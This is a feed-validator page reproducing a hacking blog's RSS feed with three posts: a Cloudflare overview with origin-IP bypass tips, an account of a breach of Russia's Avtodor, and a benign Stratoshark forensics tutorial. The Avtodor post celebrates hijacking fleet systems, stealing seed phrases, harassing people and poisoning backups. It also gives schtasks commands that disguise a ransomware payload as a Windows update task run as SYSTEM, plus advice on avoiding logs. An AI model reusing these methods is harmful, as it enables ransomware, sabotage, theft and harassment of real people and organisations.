FEED Validator

for Atom and RSS and KML

Congratulations!

This is a valid RSS feed.

Recommendations

This feed is valid, but interoperability with the widest range of feed readers could be improved by implementing the following recommendations.

line 24, column 85: Image not in required format [help]

... loads/2025/04/cropped-Favicon-32x32.webp</url>
                                             ^

line 315, column 0: content:encoded should not contain fetchpriority attribute [help]
```
<figure class="wp-block-image size-full"><img fetchpriority="high" decoding= ...
```
line 315, column 0: content:encoded should not contain decoding attribute (72 occurrences) [help]
```
<figure class="wp-block-image size-full"><img fetchpriority="high" decoding= ...
```
line 315, column 0: content:encoded should not contain sizes attribute (72 occurrences) [help]
```
<figure class="wp-block-image size-full"><img fetchpriority="high" decoding= ...
```
line 347, column 0: content:encoded should not contain loading attribute (69 occurrences) [help]
```
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async ...
```
line 1284, column 0: content:encoded should not contain data-id attribute (2 occurrences) [help]
```
<figure class="wp-block-image size-large"><img loading="lazy" decoding="asyn ...
```

Source: https://www.hackers-arise.com/blog-feed.xml

<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
xmlns:content="http://purl.org/rss/1.0/modules/content/"
xmlns:wfw="http://wellformedweb.org/CommentAPI/"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:atom="http://www.w3.org/2005/Atom"
xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
>
<channel>
<title>Hackers Arise</title>
<atom:link href="https://hackers-arise.com/feed/" rel="self" type="application/rss+xml" />
<link>https://hackers-arise.com</link>
<description>EXPERT CYBERSECURITY TRAINING FOR ETHICAL HACKERS</description>
<lastBuildDate>Mon, 30 Jun 2025 18:23:04 +0000</lastBuildDate>
<language>en-US</language>
<sy:updatePeriod>
hourly </sy:updatePeriod>
<sy:updateFrequency>
1 </sy:updateFrequency>
<generator>https://wordpress.org/?v=6.8.1</generator>
<image>
<url>https://hackers-arise.com/wp-content/uploads/2025/04/cropped-Favicon-32x32.webp</url>
<title>Hackers Arise</title>
<link>https://hackers-arise.com</link>
<width>32</width>
<height>32</height>
</image>
<item>
<title>How Cloudflare Works: The Hacker Blueprint</title>
<link>https://hackers-arise.com/how-cloudflare-works-the-hacker-blueprint/</link>
<comments>https://hackers-arise.com/how-cloudflare-works-the-hacker-blueprint/#respond</comments>
<dc:creator><![CDATA[OTW]]></dc:creator>
<pubDate>Mon, 30 Jun 2025 18:05:30 +0000</pubDate>
<category><![CDATA[Cybersecurity Tools]]></category>
<category><![CDATA[Cyberwar]]></category>
<category><![CDATA[Cyberwarrior]]></category>
<category><![CDATA[Defensive Security]]></category>
<category><![CDATA[Hacking]]></category>
<category><![CDATA[Uncategorized]]></category>
<category><![CDATA[Web Application Exploitation]]></category>
<guid isPermaLink="false">https://hackers-arise.com/?p=15837</guid>
<description><![CDATA[How Cloudflare Works: The Hacker’s Blueprint Welcome back, my aspiring cyberwarriors! Often when we attack websites, we run up against Cloudflare. Cloudflare protects about 19.3% of all websites in the world. It’s primary product is DDoS protection but also provides Content Delivery Systems (CDN) and Internet security products. If the attacker is to get past […]
The post <a href="https://hackers-arise.com/how-cloudflare-works-the-hacker-blueprint/">How Cloudflare Works: The Hacker Blueprint</a> first appeared on <a href="https://hackers-arise.com">Hackers Arise</a>.]]></description>
<content:encoded><![CDATA[<h2 class="wp-block-heading" id="how-cloudflare-works-the-hackers-blueprint">How Cloudflare Works: The Hacker’s Blueprint</h2>
Welcome back, my aspiring cyberwarriors!
Often when we attack websites, we run up against Cloudflare. Cloudflare protects about 19.3% of all websites in the world. It’s primary product is DDoS protection but also provides Content Delivery Systems (CDN) and Internet security products.
If the attacker is to get past this ubiquitous cybersecurity product, you first need to know how it functions. In this tutorial, I will try to help you understand how Cloudflare works and then in a subsequent tutorial, I will show you how you can bypass Cloudflare.
Let’s get started!
<h2 class="wp-block-heading">What Is Cloudflare?</h2>
Cloudflare is like a digital “bouncer” and performance booster for millions of websites. It sits between users and web servers, filtering, accelerating, and protecting traffic. 
If you want to understand modern web security—or break it—you need to know how Cloudflare works.
<h2 class="wp-block-heading">Step 1: DNS and Proxy Magic</h2>
When you put your site behind Cloudflare, you point your domain’s nameservers to Cloudflare. Now, Cloudflare becomes your authoritative DNS provider—it answers all DNS queries for your domain. But here’s the trick:
<ul class="wp-block-list">
<li>For proxied records, Cloudflare responds with its own anycast IP addresses—not your origin server’s real IP.</li>
<li>All user requests hit Cloudflare’s global edge network first, then get relayed to your real server.</li>
</ul>
Result: Attackers can’t see the origin IP, and all traffic is filtered through Cloudflare’s defenses.
<h2 class="wp-block-heading">Step 2: CDN—Speed and Stealth</h2>
Cloudflare is a content delivery network (CDN) with data centers in 330+ cities
<ul class="wp-block-list">
<li>It caches static content (images, scripts, etc.) at edge locations, serving users from the nearest node.</li>
<li>This reduces latency, offloads your server, and makes DDoS attacks less effective</li>
</ul>
To bypass Cloudflare’s security, you must find the actual IP of the website.
<h2 class="wp-block-heading">Step 3: Security—The Shield Wall</h2>
Cloudflare’s security arsenal includes:
<ul class="wp-block-list">
<li>DDoS Protection: Detects and blocks massive floods of malicious traffic using real-time analysis and dynamic rules</li>
<li>Web Application Firewall (WAF): Blocks SQLi, XSS, CSRF, and other web attacks with managed rulesets that are constantly updated</li>
<li>SSL/TLS Encryption: Automatically issues and manages certificates, encrypting all traffic between users and Cloudflare, and optionally between Cloudflare and your origin server</li>
<li>Access Control: Restricts who can access sensitive parts of your site, with support for multi-factor authentication and IP whitelisting</li>
<li>DNSSEC: Prevents DNS spoofing and cache poisoning attacks</li>
</ul>

<h2 class="wp-block-heading">Step 4: DDoS Mitigation—How the Giant Fights Back</h2>
Cloudflare’s DDoS systems work by:
<ul class="wp-block-list">
<li>Sampling and analyzing traffic for patterns (source IP, protocols, HTTP headers, error rates).</li>
<li>When attack traffic is detected, Cloudflare creates a real-time fingerprint and deploys mitigation rules globally—blocking, challenging, or rate-limiting malicious requests</li>
<li>Legitimate users pass through; attackers get blocked or hit with CAPTCHAs.</li>
</ul>
Hacker’s Note: Cloudflare’s rules are dynamic and ephemeral—meaning the shield adapts in real time.
<h2 class="wp-block-heading">Step 5: Edge Computing</h2>
Cloudflare isn’t just a shield—it’s also an edge platform.
<ul class="wp-block-list">
<li>You can run JavaScript code (Cloudflare Workers) at the edge, right next to users</li>
<li>This allows for custom logic, instant redirects, or even serverless apps—without touching your origin.</li>
</ul>
Why does this matter?
<ul class="wp-block-list">
<li>For defenders: You can block, log, or modify traffic before it ever hits your server.</li>
<li>For hackers: You need to test both the edge and the origin for vulnerabilities.</li>
</ul>
<h2 class="wp-block-heading">How to Spot and Test Cloudflare</h2>
<ol class="wp-block-list">
<li>Check DNS:
<ul class="wp-block-list">
<li>Use <code>dig</code> or <code>nslookup</code>—if your domain resolves to Cloudflare IPs (104.x.x.x, 172.x.x.x), the site is behind Cloudflare</li>
</ul>
</li>
<li>Bypass Attempts:
<ul class="wp-block-list">
<li>Try to find the origin IP (historical DNS, email headers, subdomains, direct IP leaks).</li>
<li>Test for unproxied subdomains or services.</li>
</ul>
</li>
<li>WAF Testing:
<ul class="wp-block-list">
<li>Send common attack payloads (SQLi, XSS) and look for custom error pages or CAPTCHAs.</li>
</ul>
</li>
<li>DDoS Testing:
<ul class="wp-block-list">
<li>Simulate traffic spikes and see how Cloudflare responds (rate limiting, blocks, challenges).</li>
</ul>
</li>
</ol>
<h2 class="wp-block-heading">Summary</h2>
Cloudflare is a global proxy, CDN, and security platform that shields websites from attacks and speeds up delivery. To get past Cloudflare protection, you must first understand how it works. In an upcoming tutorial, I will show you some ways of bypassing Cloudflare protection.
Stay sharp. Know the shield before you test the sword.

The post <a href="https://hackers-arise.com/how-cloudflare-works-the-hacker-blueprint/">How Cloudflare Works: The Hacker Blueprint</a> first appeared on <a href="https://hackers-arise.com">Hackers Arise</a>.]]></content:encoded>
<wfw:commentRss>https://hackers-arise.com/how-cloudflare-works-the-hacker-blueprint/feed/</wfw:commentRss>
<slash:comments>0</slash:comments>
</item>
<item>
<title>CyberWar: The Breach at Avtodor– Control and Collapse – Breaking Down the Infrastructure, Part 2</title>
<link>https://hackers-arise.com/cyberwar-the-breach-at-avtodor-control-and-collapse-breaking-down-the-infrastructure-part-2/</link>
<comments>https://hackers-arise.com/cyberwar-the-breach-at-avtodor-control-and-collapse-breaking-down-the-infrastructure-part-2/#respond</comments>
<dc:creator><![CDATA[Alita]]></dc:creator>
<pubDate>Thu, 26 Jun 2025 19:37:15 +0000</pubDate>
<category><![CDATA[Cyberwar]]></category>
<category><![CDATA[Cyberwarrior]]></category>
<category><![CDATA[Hacking]]></category>
<category><![CDATA[IoT Hacking]]></category>
<category><![CDATA[IP Camera Hacking]]></category>
<category><![CDATA[SCADA/ICS Hacking]]></category>
<category><![CDATA[Uncategorized]]></category>
<guid isPermaLink="false">https://hackers-arise.com/?p=15709</guid>
<description><![CDATA[Welcome back, cyberwarriors! In my previous article I detailed the process of infiltrating the Avtodor, the Russian state-run company overseeing the construction and maintenance of roads and highways. In part II we finally execute our well laid plans. Taking Over the Specialized Vehicles Most dispatcher terminals ran a vehicle monitoring app—basic fleet management. You’d expect […]
The post <a href="https://hackers-arise.com/cyberwar-the-breach-at-avtodor-control-and-collapse-breaking-down-the-infrastructure-part-2/">CyberWar: The Breach at Avtodor– Control and Collapse – Breaking Down the Infrastructure, Part 2</a> first appeared on <a href="https://hackers-arise.com">Hackers Arise</a>.]]></description>
<content:encoded><![CDATA[Welcome back, cyberwarriors! 

In my previous article I detailed the process of infiltrating the Avtodor, the Russian state-run company overseeing the construction and maintenance of roads and highways. In part II we finally execute our well laid plans.
<h2 class="wp-block-heading" id="xfafy46916">Taking Over the Specialized Vehicles</h2>
<figure class="wp-block-image size-full"><img fetchpriority="high" decoding="async" width="861" height="689" src="https://hackers-arise.com/wp-content/uploads/2025/06/SCADA.jpg" alt="" class="wp-image-15710" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/SCADA.jpg 861w, https://hackers-arise.com/wp-content/uploads/2025/06/SCADA-300x240.jpg 300w, https://hackers-arise.com/wp-content/uploads/2025/06/SCADA-768x615.jpg 768w" sizes="(max-width: 861px) 100vw, 861px" /></figure>

Most dispatcher terminals ran a vehicle monitoring app—basic fleet management. You’d expect some login protection and technically it was there. But in more than one case, the login and password were the same. Low effort, low defense. Once inside, we could see everything: routes, current tasks, maintenance logs, even mechanical health stats for individual parts of each vehicle.

<figure class="wp-block-image size-full"><img decoding="async" width="863" height="689" src="https://hackers-arise.com/wp-content/uploads/2025/06/Dispatcher-Terminal.jpg" alt="" class="wp-image-15711" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/Dispatcher-Terminal.jpg 863w, https://hackers-arise.com/wp-content/uploads/2025/06/Dispatcher-Terminal-300x240.jpg 300w, https://hackers-arise.com/wp-content/uploads/2025/06/Dispatcher-Terminal-768x613.jpg 768w" sizes="(max-width: 863px) 100vw, 863px" /><figcaption class="wp-element-caption">Fleet activity report generated from a GPS/telemetry system</figcaption></figure>

<figure class="wp-block-image size-full"><img decoding="async" width="867" height="695" src="https://hackers-arise.com/wp-content/uploads/2025/06/GPS-tracking-and-activity-report-for-utility-vehicles.jpg" alt="" class="wp-image-15712" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/GPS-tracking-and-activity-report-for-utility-vehicles.jpg 867w, https://hackers-arise.com/wp-content/uploads/2025/06/GPS-tracking-and-activity-report-for-utility-vehicles-300x240.jpg 300w, https://hackers-arise.com/wp-content/uploads/2025/06/GPS-tracking-and-activity-report-for-utility-vehicles-768x616.jpg 768w" sizes="(max-width: 867px) 100vw, 867px" /><figcaption class="wp-element-caption">GPS tracking and activity report for utility vehicles</figcaption></figure>

<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="740" height="592" src="https://hackers-arise.com/wp-content/uploads/2025/06/The-КАРТА-fleet-monitoring-dashboard.avif" alt="" class="wp-image-15713" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/The-КАРТА-fleet-monitoring-dashboard.avif 740w, https://hackers-arise.com/wp-content/uploads/2025/06/The-КАРТА-fleet-monitoring-dashboard-300x240.jpg 300w" sizes="(max-width: 740px) 100vw, 740px" /><figcaption class="wp-element-caption">The КАРТА fleet monitoring dashboard</figcaption></figure>

<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="740" height="592" src="https://hackers-arise.com/wp-content/uploads/2025/06/Vehicle-Tracking-Dashboard-1.avif" alt="" class="wp-image-15715" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/Vehicle-Tracking-Dashboard-1.avif 740w, https://hackers-arise.com/wp-content/uploads/2025/06/Vehicle-Tracking-Dashboard-1-300x240.jpg 300w" sizes="(max-width: 740px) 100vw, 740px" /><figcaption class="wp-element-caption">Vehicle status and tracking dashboard</figcaption></figure>

We could track them in real time, stop them, and watch the weather in that part of Moscow where they were. You name it! It was full visibility and full control.
If you’ve seen Mr. Robot, you’ll remember that scene where the FBI was tailing a taxi with Elliot and Darlene in it. Irving called dispatch, claimed the car was stolen, and they shut it down remotely. Same concept here. It was live.
<h2 class="wp-block-heading" id="gia2u43973">Data Exfiltration</h2>
By the time we got to this stage, we knew the system inside and out. Exfil was quick. Sometimes manual—grab what you need as you go. Other times scripted, if the target folders were obvious or if we were short on time.
Small files were pulled out using Evil-WinRM through the SOCKS proxy. For bigger dumps, we used PowerShell scripts like PSUpload. Could we have gone full covert with ICMP or DNS tunneling? Sure. But it wasn’t necessary. The real threat wasn’t the network—it was the user and whatever AV they had running.
<h2 class="wp-block-heading" id="qkr9p44028">Paranoia</h2>
This part was saved for the collaborators, people working in the occupied zones. Like in Dante’s circles, traitors had the worst fate.
It took a week of steady pressure: accounts deleted, passwords changed, password reset codes spammed to phones, active sessions shut down across Telegram, WhatsApp, browser syncs. 2FA tokens were revoked. Authenticator apps unlinked. Anything that could be touched, was touched. If we couldn’t delete the account, we wiped the contents.

<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="740" height="416" src="https://hackers-arise.com/wp-content/uploads/2025/06/6a4a49_31405da2c11d476cbfcd391b6075746dmv2.avif" alt="" class="wp-image-15716" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/6a4a49_31405da2c11d476cbfcd391b6075746dmv2.avif 740w, https://hackers-arise.com/wp-content/uploads/2025/06/6a4a49_31405da2c11d476cbfcd391b6075746dmv2-300x169.jpg 300w" sizes="(max-width: 740px) 100vw, 740px" /></figure>

<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="740" height="368" src="https://hackers-arise.com/wp-content/uploads/2025/06/Disabling-Two-Factor-Authentication.avif" alt="" class="wp-image-15717" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/Disabling-Two-Factor-Authentication.avif 740w, https://hackers-arise.com/wp-content/uploads/2025/06/Disabling-Two-Factor-Authentication-300x149.jpg 300w" sizes="(max-width: 740px) 100vw, 740px" /></figure>

<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="740" height="492" src="https://hackers-arise.com/wp-content/uploads/2025/06/Telegram.avif" alt="" class="wp-image-15718" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/Telegram.avif 740w, https://hackers-arise.com/wp-content/uploads/2025/06/Telegram-300x199.jpg 300w" sizes="(max-width: 740px) 100vw, 740px" /></figure>

Some had seed phrases stored in Telegram saved messages, right there on their workstations. Those phrases didn’t stay there long.
Now imagine waking up to that. Day after day. You don’t know how deep it goes. Maybe someone’s watching your webcam. Maybe your mic is live. It’s not the breach that gets them, it’s the uncertainty.
<h2 class="wp-block-heading" id="ag86r44759">Web Application: Digital Access Control</h2>
There was a centralized web app managing access permits for vehicles and workers. You could issue new permits or revoke existing ones. You could even hire and fire staff by adding or removing IDs in the backend.

<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="740" height="416" src="https://hackers-arise.com/wp-content/uploads/2025/06/The-login-screen-for-an-internal-system-used-by-the-Moscow-municipal-road-services.avif" alt="" class="wp-image-15719" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/The-login-screen-for-an-internal-system-used-by-the-Moscow-municipal-road-services.avif 740w, https://hackers-arise.com/wp-content/uploads/2025/06/The-login-screen-for-an-internal-system-used-by-the-Moscow-municipal-road-services-300x169.jpg 300w" sizes="(max-width: 740px) 100vw, 740px" /><figcaption class="wp-element-caption">The login screen for an internal system used by the Moscow municipal road services</figcaption></figure>

<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="740" height="416" src="https://hackers-arise.com/wp-content/uploads/2025/06/Globador-used-for-managing-employee-access.avif" alt="" class="wp-image-15720" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/Globador-used-for-managing-employee-access.avif 740w, https://hackers-arise.com/wp-content/uploads/2025/06/Globador-used-for-managing-employee-access-300x169.jpg 300w" sizes="(max-width: 740px) 100vw, 740px" /><figcaption class="wp-element-caption">Globador, used for managing employee access</figcaption></figure>
We didn’t hesitate. All active permits were revoked. IDs started vanishing from the system. By the end, it looked like a startup with one lonely admin left—except we changed his password too. Now it was our account.
<h2 class="wp-block-heading" id="y2x7g45202">The Rugpull</h2>
4 AM Moscow time was the best window for this task. Low traffic. Fewer eyes. Fewer questions. That gave us a solid two-hour block to hit the entire network without resistance.
By this point, Windows Defender was disabled across all critical machines. That was handled earlier. The plan was to drop ransomware and encrypt systems in one synchronized hit.
If the environment uses Active Directory, you can use Group Policy to push a scheduled task across all systems. That task downloads a payload from a shared folder and runs it. If no AD? You upload executables manually. Slower, but still gets the job done, just needs more hands or more time. But be careful, If they cut the internet as a defense, that’s when lights go out for all of us.
For larger environments without AD, we set up individual scheduled tasks on each system with SYSTEM-level privileges. That way, they all execute at once and cook the entire network clean.
Here’s how you set up a scheduled task in CMD or PowerShell:
schtasks /create /tn “Windows Update Service” /tr “C:\Windows\Tasks\RANSOME.exe” /sc daily /st 04:00 /ru System /f
To confirm it’s in place:
schtasks /query /tn “Windows Update Service”
And if you ever need to force it early:
schtasks /run /tn “Windows Update Service”
CMD is your friend here, it’s quieter than PowerShell, which logs everything. Set the task daily, just in case. If the grid drops at 4 AM, you get another shot tomorrow. Let the machines handle the rest.

<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="740" height="304" src="https://hackers-arise.com/wp-content/uploads/2025/06/Network.avif" alt="" class="wp-image-15721" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/Network.avif 740w, https://hackers-arise.com/wp-content/uploads/2025/06/Network-300x123.jpg 300w" sizes="(max-width: 740px) 100vw, 740px" /></figure>

Here you can see some of them “well-done”. The entire network, of course, wouldn’t fit the screen.
Taking Over the Cloud
Once we sorted through the internal data, we found credentials to their cloud systems. The cloud was used to monitor production with data coming in from various sites, all centralized for analysis.
We got lucky. The admin account was compromised early. We had full control. But we didn’t go loud. Instead, we dismantled it piece by piece. It started with quiet database edits. Not deletion, but distortion. So when backups ran, they saved corrupted data. Over time, the backups themselves were poisoned.

<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="740" height="341" src="https://hackers-arise.com/wp-content/uploads/2025/06/user-access-control-interface-for-the-Moscow-city-government.avif" alt="" class="wp-image-15725" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/user-access-control-interface-for-the-Moscow-city-government.avif 740w, https://hackers-arise.com/wp-content/uploads/2025/06/user-access-control-interface-for-the-Moscow-city-government-300x138.jpg 300w" sizes="(max-width: 740px) 100vw, 740px" /><figcaption class="wp-element-caption">User access control interface for the Moscow city government</figcaption></figure>

After about a month of quiet manipulation, we flipped the switch. Deleted users, wiped records, wrecked the environment from the inside. This happened right after we crippled their internal network, so there was no quick fix.

<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="740" height="584" src="https://hackers-arise.com/wp-content/uploads/2025/06/connection-timeout-error.avif" alt="" class="wp-image-15726" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/connection-timeout-error.avif 740w, https://hackers-arise.com/wp-content/uploads/2025/06/connection-timeout-error-300x237.jpg 300w" sizes="(max-width: 740px) 100vw, 740px" /></figure>

They scrambled to rebuild the cloud from scratch. Some data might be gone forever. That’s the kind of loss you can’t patch over.
<h2 class="wp-block-heading" id="2ncbr46697">Conclusion</h2>
From initial access through the supply chain to full control over Avtodor’s infrastructure, this operation showed how deep a network can be penetrated when persistence, planning, and patience come together. We moved through cloud environments, dispatcher systems, surveillance feeds, and vehicle control platforms collecting intel, disrupting operations, and leaving no corner untouched.
The exfiltration was clean. The sabotage was deliberate. The system was compromised from inside out, quiet at first, then loud enough to leave a lasting mark.
Hope you cyberwarriors learned something new about access, control, timing, and the art of staying hidden until it’s time to strike!The post <a href="https://hackers-arise.com/cyberwar-the-breach-at-avtodor-control-and-collapse-breaking-down-the-infrastructure-part-2/">CyberWar: The Breach at Avtodor– Control and Collapse – Breaking Down the Infrastructure, Part 2</a> first appeared on <a href="https://hackers-arise.com">Hackers Arise</a>.]]></content:encoded>
<wfw:commentRss>https://hackers-arise.com/cyberwar-the-breach-at-avtodor-control-and-collapse-breaking-down-the-infrastructure-part-2/feed/</wfw:commentRss>
<slash:comments>0</slash:comments>
</item>
<item>
<title>Network Forensics: Getting Started With Stratoshark</title>
<link>https://hackers-arise.com/network-forensics-getting-started-with-stratoshark/</link>
<comments>https://hackers-arise.com/network-forensics-getting-started-with-stratoshark/#respond</comments>
<dc:creator><![CDATA[aircorridor]]></dc:creator>
<pubDate>Tue, 24 Jun 2025 20:24:41 +0000</pubDate>
<category><![CDATA[Cyberwar]]></category>
<category><![CDATA[Cyberwarrior]]></category>
<category><![CDATA[Data Analytics]]></category>
<category><![CDATA[Digital Forensics]]></category>
<category><![CDATA[InfoSec]]></category>
<category><![CDATA[Network Exploitation]]></category>
<category><![CDATA[Uncategorized]]></category>
<guid isPermaLink="false">https://hackers-arise.com/?p=15587</guid>
<description><![CDATA[Welcome back, aspiring Digital Forensics Investigators! For decades, the open-source Wireshark network protocol analyzer has been an essential tool for networking professionals, enabling them to inspect and troubleshoot network traffic through packet analysis. However, as organizations have increasingly shifted workloads to the cloud, they’ve struggled with reduced visibility into system activity. To address this gap, […]
The post <a href="https://hackers-arise.com/network-forensics-getting-started-with-stratoshark/">Network Forensics: Getting Started With Stratoshark</a> first appeared on <a href="https://hackers-arise.com">Hackers Arise</a>.]]></description>
<content:encoded><![CDATA[Welcome back, aspiring Digital Forensics Investigators!
For decades, the open-source Wireshark network protocol analyzer has been an essential tool for networking professionals, enabling them to inspect and troubleshoot network traffic through packet analysis. However, as organizations have increasingly shifted workloads to the cloud, they’ve struggled with reduced visibility into system activity. To address this gap, Stratoshark was introduced.
<figure class="wp-block-image aligncenter size-full"><img loading="lazy" decoding="async" width="740" height="387" src="https://hackers-arise.com/wp-content/uploads/2025/06/stratoshark_logo.avif" alt="" class="wp-image-15588" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/stratoshark_logo.avif 740w, https://hackers-arise.com/wp-content/uploads/2025/06/stratoshark_logo-300x157.jpg 300w" sizes="(max-width: 740px) 100vw, 740px" /></figure>
<h2 class="wp-block-heading" id="vw6b6113">What is Stratoshark?</h2>
Stratoshark is a companion application to Wireshark, designed to analyze system calls and log messages from SCAP files, providing deeper insights into system-level activity. Since modern cloud systems primarily use Linux for running applications in containers, Stratoshark helps users troubleshoot, secure, and monitor their systems by capturing system activity directly from the Linux kernel.
Just as Wireshark helps network teams analyze packet data from PCAP files, Stratoshark records and interprets system activity using libsinsp and libscap libraries, creating .scap files for detailed analysis.
<ul id="67jy0119" class="wp-block-list">
<li>libsinsp is a system event processing library that allows Stratoshark to analyze system calls in real time, offering insights into how processes interact with the operating system.</li>
<li>libscap is responsible for capturing system calls and audit logs directly from the Linux kernel, functioning as the data collection engine behind Stratoshark. It enables users to record detailed system activity for later examination.</li>
</ul>
Stratoshark extends beyond system calls to enhance cloud security monitoring. It can collect cloud audit logs using libscap, the same library used by Sysdig (a security and monitoring tool) and Falco (a runtime security tool for detecting threats). With the Falco CloudTrail plugin, Stratoshark retrieves AWS CloudTrail logs from S3, SQS, or SNS, helping security teams detect and analyze potential threats in cloud environments.
<figure class="wp-block-image aligncenter size-full"><img loading="lazy" decoding="async" width="740" height="387" src="https://hackers-arise.com/wp-content/uploads/2025/06/stratoshark_structure.avif" alt="" class="wp-image-15589" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/stratoshark_structure.avif 740w, https://hackers-arise.com/wp-content/uploads/2025/06/stratoshark_structure-300x157.jpg 300w" sizes="(max-width: 740px) 100vw, 740px" /></figure>
<h2 class="wp-block-heading" id="6f19s313">What are System Calls?</h2>
On a computer, you have various applications, such as web browsers, email clients, music players, and word processors—along with anything else you’ve installed. These applications often need to interact with external resources: web browsers require network access, music players need sound devices, etc. However, these applications don’t inherently know how to handle these interactions by themselves.
The operating system (OS) manages these interactions. It distinguishes between different connection types like WiFi and Ethernet, or storage devices like NVMe and SATA drives. More importantly, it abstracts these differences away so applications don’t need to worry about the underlying hardware details.
To facilitate this, the OS provides a standard set of functions that applications use to interact with external devices. These functions are typically straightforward, such as read(), write(), socket(), and sendmsg(). Together, they form what we call system calls. By monitoring these system calls, we can observe everything a program attempts to do—from network communications and file access to sound playback and much more.
<h2 class="wp-block-heading" id="bthl9424">How Can We Capture System Calls?</h2>
You can generate SCAP files using the sysdig command-line tool or by running Stratoshark directly on a Linux system.
Stratoshark supports multiple capture sources, including:
<ul id="48bsf430" class="wp-block-list">
<li>Falcodump – Captures logs from various sources using Falco plugins and Linux syscalls.</li>
<li>Sshdig – Enables remote system call capture over SSH using Sysdig.</li>
</ul>
<h2 class="wp-block-heading" id="l4bda634">Key Features of Stratoshark</h2>
Stratoshark offers several powerful features that make it an essential tool for system-level analysis:
<ol start="1" id="gj88g638" class="wp-block-list">
<li>Real-time System Activity Monitoring: Track and analyze system calls as they happen.</li>
<li>Comprehensive Filtering Options: Quickly isolate relevant system events using display filters.</li>
<li>Cloud Integration: Native support for analyzing cloud audit logs.</li>
<li>Visualization Tools: Transform complex system call sequences into understandable visualizations.</li>
<li>Container Visibility: Gain insights into containerized applications and their interactions.</li>
<li>Threat Detection: Identify suspicious activity patterns through system call analysis.</li>
</ol>
Similar to Wireshark’s color-coding for packet types, Stratoshark uses visual indicators to help analysts quickly identify different types of system calls and potential security issues.
<h2 class="wp-block-heading" id="ej6qz943">Stratoshark vs. Wireshark: Understanding the Differences</h2>
While Stratoshark and Wireshark share similar interfaces and analysis approaches, they focus on different aspects of system observation:
<figure class="wp-block-table"><table class="has-fixed-layout"><tbody><tr><td>Feature</td><td>Stratoshark</td><td>Wireshark</td></tr><tr><td>Primary Focus</td><td>System calls and OS interactions</td><td>Network packets and protocols</td></tr><tr><td>File Format</td><td>SCAP files</td><td>PCAP files</td></tr><tr><td>Main Use Cases</td><td>System troubleshooting, security monitoring, container analysis</td><td>Network troubleshooting, protocol analysis, traffic inspection</td></tr><tr><td>Capture Mechanism</td><td>Kernel modules, eBPF probes</td><td>Network interfaces, packet capture libraries</td></tr><tr><td>Environment</td><td>Particularly valuable in cloud and containerized systems</td><td>Network infrastructure (physical or virtual)</td></tr><tr><td>Analysis Level</td><td>OS and application behavior</td><td>Network communications</td></tr></tbody></table></figure>
These tools complement each other perfectly – Wireshark reveals what’s happening on the network, while Stratoshark provides visibility into what’s occurring inside the systems themselves.
<h2 class="wp-block-heading" id="sy1jh3757">Getting Stratoshark</h2>
Development packages for <a href="https://www.wireshark.org/download/automated/win64/" rel="noreferrer noopener" target="_blank">Windows</a> and <a href="https://www.wireshark.org/download/automated/osx/" rel="noreferrer noopener" target="_blank">macOS</a> are available through Wireshark’s automated builds. Note that native system call capture isn’t supported on these platforms.
For Stratoshark on Linux, you’ll need to <a href="https://gitlab.com/wireshark/wireshark/-/blob/master/doc/stratoshark-quick-start.adoc#user-content-building-stratoshark" rel="noreferrer noopener" target="_blank">build it from source</a>.
For simplicity and ease of learning, I’ll be using Windows 11, where the installation process is as straightforward as any standard Windows application.
<h2 class="wp-block-heading" id="rcg6o4114">First Look: Navigating the Stratoshark Interface</h2>
<h3 class="wp-block-heading" id="0672f4116">Initial Launch Experience</h3>
When you first launch Stratoshark after installation, you’ll be greeted by its main interface, which deliberately mirrors Wireshark’s familiar layout to make transitioning between tools seamless. The application features a clean, well-organized workspace specifically designed for efficient system call analysis.
<figure class="wp-block-image aligncenter size-full"><img loading="lazy" decoding="async" width="740" height="579" src="https://hackers-arise.com/wp-content/uploads/2025/06/stratoshark_first_look.avif" alt="" class="wp-image-15590" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/stratoshark_first_look.avif 740w, https://hackers-arise.com/wp-content/uploads/2025/06/stratoshark_first_look-300x235.jpg 300w" sizes="(max-width: 740px) 100vw, 740px" /></figure>
<h3 class="wp-block-heading" id="dqxew4766">Accessing Sample Captures</h3>
To start exploring Stratoshark’s capabilities without capturing your own data, head over to the official website <a href="http://wiki.wireshark.org/Stratoshark" rel="noreferrer noopener" target="_blank">wiki.wireshark.org/Stratoshark</a>, where you’ll find several sample SCAP files specifically created for learning purposes.
<figure class="wp-block-image aligncenter size-full"><img loading="lazy" decoding="async" width="740" height="268" src="https://hackers-arise.com/wp-content/uploads/2025/06/stratoshark_samples.avif" alt="" class="wp-image-15591" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/stratoshark_samples.avif 740w, https://hackers-arise.com/wp-content/uploads/2025/06/stratoshark_samples-300x109.jpg 300w" sizes="(max-width: 740px) 100vw, 740px" /></figure>
<h3 class="wp-block-heading" id="pva7s5531">Analyzing SCAP Files with Stratoshark</h3>
Upon opening a SCAP file in Stratoshark, you’ll immediately notice the interface resembles Wireshark. The key difference, however, lies in the event details pane (the Stratoshark equivalent to Wireshark’s packet details pane).
